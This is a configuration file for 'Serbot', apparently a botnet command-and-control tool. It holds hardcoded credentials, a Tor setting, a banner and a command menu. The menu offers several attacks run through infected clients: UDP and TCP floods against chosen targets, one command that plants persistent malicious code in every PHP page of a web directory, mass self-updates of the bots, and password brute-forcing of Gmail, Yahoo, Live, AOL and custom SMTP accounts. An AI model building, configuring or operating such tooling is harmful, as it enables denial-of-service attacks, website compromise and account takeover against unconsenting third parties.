
# Version Info
_API_VERSION = "v0.1"
_version="v1.0"	

## Crypto
SALT_SIZE = 16
NUMBER_OF_ITERATIONS = 20
AES_MULTIPLE = 16
password="Test23"
tor=True

# Database
dbuser='serbot'
dbpassword='password'
dbhost='127.0.0.1'
database='serbot'

# Server 
server="127.0.0.1"
port=2333

# System Settings
OS=""
Debug=False
DB=True

# Banner
intro="""
     ____ ____ ____ ____ ____ ____ 
    ||S |||e |||r |||b |||o |||t ||
    ||__|||__|||__|||__|||__|||__||
    |/__\|/__\|/__\|/__\|/__\|/__\|

---------------------------------------
                                 v1.0"""

# Command Menu
allcommands="""
Primary:
--------
accept | Accept connections
list | List connections
clear | Clear the console
quit | Close all connections and quit
credits | Show Credits
help | Show this message
Client Interaction:
-------------------
interact <id> | Interact with client
stop | Stop interacting with client
udpflood <ip>:<port> | UDP flood threw client
tcpflood <ip>:<port> | TCP flood threw client
serbackdoor <web dir> | Infects all PHP Pages with Malicious Code that will run the Serbot Client (if killed) again
rmbackdoor <web dir> | Removes the Malicious PHP Code
Wide Commands:
--------------
udpfloodall <ip>:<port> | Same as `udpflood` but for All clients
tcpfloodall <ip>:<port> | Same as `tcpflood` but for All clients
selfupdateall | Update all Clients with the new version from Github
Bruteforce:
-----------
gmailbruteforce <email>:<keys>:<min>:<max>
yahoobruteforce <email>:<keys>:<min>:<max>
livebruteforce <email>:<keys>:<min>:<max>
aolbruteforce <email>:<keys>:<min>:<max>
Example: gmailbruteforce someone@gmail.com:0123456789:6:8
custombruteforce <address>:<port>:<email>:<keys>:<min>:<max>
Example: custombruteforce smtp.whatever.com:587:something@whatever.com:abcdefghi:4:6
\n"""
